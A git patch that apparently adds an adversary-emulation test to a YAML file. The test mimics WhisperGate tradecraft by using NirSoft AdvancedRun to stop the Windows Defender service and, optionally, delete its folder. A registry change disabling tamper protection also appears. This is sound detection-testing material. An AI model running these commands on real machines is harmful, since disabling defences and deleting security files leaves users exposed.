From cbeebddaa4fecb952c61c2a10c7b375864d4cef4 Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Tue, 5 Apr 2022 10:59:08 -0500
Subject: [PATCH] Adding T1562.001 Test 28 (Issue 1839) (#1845)

* Adding T1562.001 Test 28 (Issue 1839)

* Updating T1562.001 YAML to include additional input arg and cleanup

* make folder delete optional

* Update T1562.001.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1562.001/T1562.001.yaml | 38 +++++++++++++++++++++++++++++++-
 1 file changed, 37 insertions(+), 1 deletion(-)

diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index f0a76542..486a1f61 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -585,4 +585,40 @@ atomic_tests:
       New-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 0
     cleanup_command: Set-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Feature' -name 'TamperData' -value 1
     name: powershell
-  
+- name: Disable Defender Using NirSoft AdvancedRun
+  description: |
+    Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
+    This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
+    See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
+    Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk. 
+  supported_platforms:
+  - windows
+  input_arguments:
+    AdvancedRun_Location:
+      description: Path of Advanced Run executable
+      type: Path
+      default: '$env:temp\AdvancedRun.exe'
+    delete_defender_folder:
+      description: Set to 1 to also delete the Windows Defender folder
+      type: Integer
+      default: 0
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Advancedrun.exe must exist at #{AdvancedRun_Location}
+    prereq_command: |
+      if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
+      Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
+  executor:
+    command: |
+      Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+      if(#{delete_defender_folder}){
+        $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
+        Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
+      }
+    cleanup_command: |
+      Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
+    name: powershell
+    elevation_required: true